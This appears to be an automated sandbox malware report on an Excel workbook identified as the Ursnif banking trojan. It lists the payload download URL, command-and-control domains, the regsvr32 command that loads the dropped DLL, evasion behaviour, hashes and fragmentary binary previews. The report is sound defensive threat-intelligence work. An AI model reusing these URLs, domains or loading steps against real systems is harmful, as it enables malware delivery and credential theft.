                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2216Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2680Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsJump to dropped file
                      Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C77FF FindFirstFileExA,6_2_6E2C77FF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6E2C7327
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress,6_2_6E2A1552
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C5D2F mov eax, dword ptr fs:[00000030h]6_2_6E2C5D2F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2F85B0 mov eax, dword ptr fs:[00000030h]6_2_6E2F85B0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2F80E6 push dword ptr fs:[00000030h]6_2_6E2F80E6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2F84DF mov eax, dword ptr fs:[00000030h]6_2_6E2F84DF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C36F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6E2C36F2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6E2C7327
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2C3C18 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6E2C3C18

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.updatebrouser.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: apt.updateffboruse.com
                      Source: Yara matchFile source: app.xml, type: SAMPLE
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dllJump to behavior
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmpBinary or memory string: !Progman
                      Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,6_2_6E2A105E
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A2E33 cpuid 6_2_001A2E33
                      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,6_2_6E2A109B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_6E2A1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,6_2_6E2A1C6F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_001A2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,6_2_001A2E33

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation41Path InterceptionProcess Injection112Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsNative API3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery36Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms37%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms68%ReversingLabsWin32.Trojan.Ursnif
                      C:\Users\Public\codec.dll37%MetadefenderBrowse
                      C:\Users\Public\codec.dll68%ReversingLabsWin32.Trojan.Ursnif

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      6.2.regsvr32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      iqwasithealth.com7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.%s.comPA0%URL Reputationsafe
                      https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms0%Avira URL Cloudsafe
                      http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET0%Avira URL Cloudsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      iqwasithealth.com
                      		50.87.248.41
                      		truetrueunknown
                      app.updatebrouser.com
                      		unknown
                      		unknowntrue
                        		unknown
                        apt.updateffboruse.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cmstrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.%s.comPAregsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		low
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmpfalse
                            		high
                            http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcETregsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://servername/isapibackend.dllWMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		low

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            50.87.248.41
                            		iqwasithealth.comUnited States
                            		46606UNIFIEDLAYER-AS-1UStrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:507191
                            Start date:21.10.2021
                            Start time:19:39:47
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:inquiry[2021.09.23_12-51].xlsb
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:9
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLSB@6/4@4/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 16% (good quality ratio 15.3%)
                            • Quality average: 80.1%
                            • Quality standard deviation: 27.8%
                            HCA Information:
                            • Successful, ratio: 63%
                            • Number of executed functions: 54
                            • Number of non-executed functions: 54
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xlsb
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                            • Not all processes where analyzed, report is missing behavior information

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            19:41:21API Interceptor19x Sleep call for process: WMIC.exe modified
                            19:42:22API Interceptor86x Sleep call for process: regsvr32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            50.87.248.41new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              iqwasithealth.comnew_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                              • 50.87.248.41

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              UNIFIEDLAYER-AS-1USPayment Order PDF.exeGet hashmaliciousBrowse
                              • 162.241.219.173
                              QUOTATION.exeGet hashmaliciousBrowse
                              • 50.87.140.181
                              REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                              • 50.87.182.158
                              mal.xlsGet hashmaliciousBrowse
                              • 192.185.129.109
                              mal.xlsGet hashmaliciousBrowse
                              • 192.185.129.109
                              Perdue Record Copy.xlsxGet hashmaliciousBrowse
                              • 162.241.126.181
                              Tf9ATzpdKRGet hashmaliciousBrowse
                              • 98.131.204.201
                              Perdue Record Copy.xlsxGet hashmaliciousBrowse
                              • 162.241.126.181
                              DMS210949 MV LYDERHORN LOW MIX RATIO.xlsxGet hashmaliciousBrowse
                              • 108.167.135.122
                              Delivery Note for Shipment.exeGet hashmaliciousBrowse
                              • 192.254.180.165
                              Order Form.xlsxGet hashmaliciousBrowse
                              • 108.167.189.66
                              PO#HD512-6 5700)12.exeGet hashmaliciousBrowse
                              • 162.214.50.135
                              RFQ-41845597.exeGet hashmaliciousBrowse
                              • 69.49.227.173
                              DUBAI HMC2022.exeGet hashmaliciousBrowse
                              • 162.241.169.22
                              po.exeGet hashmaliciousBrowse
                              • 162.241.217.72
                              ouB4vwDfpl.exeGet hashmaliciousBrowse
                              • 162.214.153.220
                              Kingsberycpas Record Copy.xlsxGet hashmaliciousBrowse
                              • 162.241.126.181
                              Kingsberycpas Record Copy.xlsxGet hashmaliciousBrowse
                              • 162.241.126.181
                              trend-282695677.xlsGet hashmaliciousBrowse
                              • 192.185.129.109
                              trend-282695677.xlsGet hashmaliciousBrowse
                              • 192.185.129.109

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              7dcce5b76c8b17472d024758970a406b61o5kEJSud.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              mal.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              Perdue Record Copy.xlsxGet hashmaliciousBrowse
                              • 50.87.248.41
                              Kingsberycpas Record Copy.xlsxGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-282695677.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              biz-1424450009.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              biz-1070052673.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              PO #11325201021.xlsxGet hashmaliciousBrowse
                              • 50.87.248.41
                              Order Purchase Report.docGet hashmaliciousBrowse
                              • 50.87.248.41
                              Order Purchase Report.docGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-523513245.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-52277013.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-1652392449.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              Shipping documents Invoice, PL, CO BL Copy 0043952021.docGet hashmaliciousBrowse
                              • 50.87.248.41
                              Pago_Monex_usd.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-371946054.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-21410219.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-2077222320.xlsGet hashmaliciousBrowse
                              • 50.87.248.41
                              Alliancepartners September Payment.xlsxGet hashmaliciousBrowse
                              • 50.87.248.41
                              trend-1534874860.xlsGet hashmaliciousBrowse
                              • 50.87.248.41

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cmsnew_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                C:\Users\Public\codec.dllnew_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:downloaded
                                  Size (bytes):353792
                                  Entropy (8bit):6.649926576275444
                                  Encrypted:false
                                  SSDEEP:6144:8ufHKG+wtMydWttXtUxIhYD+BHi1RN5CA9fc0C5Na5uMt/bL22P:JqG+aMydWXX6Jqi1RJVcfN4pRLhP
                                  MD5:E7AC180E8217A97505FEE5B06709D331
                                  SHA1:85B078B46C648EC00DE6E1952E4D165EDBBC878E
                                  SHA-256:D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                                  SHA-512:CBDAB6A7E967CCCB6B5CD2E611B479B367EE3B160936EC697A6C929F8AD47F767A7C427AFEA04E192421F1C064B00773CD53344981755BD56A6448280AC09FE5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Joe Sandbox View:
                                  • Filename: new_working_conditions[2021.09.23_12-51].xlsb, Detection: malicious, Browse
                                  Reputation:low
                                  IE Cache URL:https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ze.D;..D;..D;.....N;.....>;.....g;...S..g;...S..Q;...S..J;....G;..D;..&;...S..N;...S..E;...S.E;...S..E;..RichD;..................PE..L...WB.[...........!.................6..............................................i.....@..........................P..T...4Q..................................L....G..T............................G..@............................................text...G........................... ..`.rdata...|.......~..................@..@.data....p...`.......H..............@....reloc..L............R..............@..B........................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1179 x 832, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):560141
                                  Entropy (8bit):7.998249179675146
                                  Encrypted:true
                                  SSDEEP:12288:mQIo6UHg7xFXSW6ydUO0+EeL6p2cX3O15YhlN:mQwXtRGT+EeLe255y
                                  MD5:0D3A3E5416D7684E6A71C0F665F43363
                                  SHA1:A43A631379852A4371F1EFDBFCA94B2520BCBA46
                                  SHA-256:4B24CDA7EEC1834B1AF96DB036FE46B49EDC76802693ACDF4F10001627CB099D
                                  SHA-512:913CBE348B8B44B653A68A17FECCC0D4EDA567A8600F2C4C979F4D728E143008B3D279D7CFE558107F60E40119E01F124EB37B6DD2423D5CC11F34F974E19499
                                  Malicious:false
                                  Reputation:low
                                  Preview: .PNG........IHDR.......@........(....sRGB.........pHYs...t...t..f.x....IDATx^...mGU.oo.M....i@ t..H.^C/.@T,."<Q...QD.."....AJ.5.B...(!=....o....3..}..}....|w.9S.6k....G..(?../...;.W_.}T\...u.b..TW.]...g......._..l.q...(U..B..t..d.X..o.5.0.........;/@^PG.F,9C......"..q%...w,...t..5.H$....`.Y..N._....R....C_@...l.m.6....UG.o[Dz..\M..m..:.+76;5.........@..I.T..x1...Iv.X.b....(...._!...%Y9.(...5.2PPLH..[..Y.L.N..g._-.."R.<.z.R#u.*..*/K...8/_.<k..K.....hi*[..8Vg...Kb..e.)........Q..jA )..?.;.........6...:.Xj.d3.....M<O...."..cP.....8..{!.(h...V[.~.^...$R6o..".In.\...5. ..i.f..Qg.k.Y..z$.c.@60...?.).7*....Jr.h........~..Qf).:..`..P`....@Jy...:._...97...f.....D.-8V.... D......GP..+..(..L`O..zl.L%M.#.#.n.0_..."wZ..........H..h..|.c.F....T.8.U.z.d......J..8.hI...\....h..3Mq+dj*..fv.....F....*..,..H.......i.."Qz.......a...kA.Y......`.E.*..n..&.$'z..d..._......V..|o<....xZ........k.2.....Z..;%".YC....N+.C.!.......Y.e.G.9.t..mr~1X...5..oex....BH..M~.
                                  C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsb
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):165
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  C:\Users\Public\codec.dll
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):353792
                                  Entropy (8bit):6.649926576275444
                                  Encrypted:false
                                  SSDEEP:6144:8ufHKG+wtMydWttXtUxIhYD+BHi1RN5CA9fc0C5Na5uMt/bL22P:JqG+aMydWXX6Jqi1RJVcfN4pRLhP
                                  MD5:E7AC180E8217A97505FEE5B06709D331
                                  SHA1:85B078B46C648EC00DE6E1952E4D165EDBBC878E
                                  SHA-256:D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
                                  SHA-512:CBDAB6A7E967CCCB6B5CD2E611B479B367EE3B160936EC697A6C929F8AD47F767A7C427AFEA04E192421F1C064B00773CD53344981755BD56A6448280AC09FE5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 37%, Browse
                                  • Antivirus: ReversingLabs, Detection: 68%
                                  Joe Sandbox View:
                                  • Filename: new_working_conditions[2021.09.23_12-51].xlsb, Detection: malicious, Browse
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ze.D;..D;..D;.....N;.....>;.....g;...S..g;...S..Q;...S..J;....G;..D;..&;...S..N;...S..E;...S.E;...S..E;..RichD;..................PE..L...WB.[...........!.................6..............................................i.....@..........................P..T...4Q..................................L....G..T............................G..@............................................text...G........................... ..`.rdata...|.......~..................@..@.data....p...`.......H..............@....reloc..L............R..............@..B........................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:Zip archive data, at least v2.0 to extract
                                  Entropy (8bit):7.997293747708592
                                  TrID:
                                  • Excel Microsoft Office Open XML Format document with Macro (51004/1) 34.81%
                                  • Excel Microsoft Office Binary workbook document (47504/1) 32.42%
                                  • Excel Microsoft Office Open XML Format document (40004/1) 27.30%
                                  • ZIP compressed archive (8000/1) 5.46%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:inquiry[2021.09.23_12-51].xlsb
                                  File size:591445
                                  MD5:d5dedf5221391bc183c80173ed5f4279
                                  SHA1:bc48802d095a79a9fb8196d35506c4862c937936
                                  SHA256:f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9
                                  SHA512:a5897ef999acb94b6badecac604832f9bd9537bac95172b4ae8b8e832d42d1cdb7107b5d1de84f1e4ec64357d9f3c5b63b3ad2393c9e5bf9b9e4b2979d011b52
                                  SSDEEP:12288:XJo6Chb0c7x1XSW6qdUO0+geLAo63jashmq4jBz:Xq9XtHGT+geLqaFZ
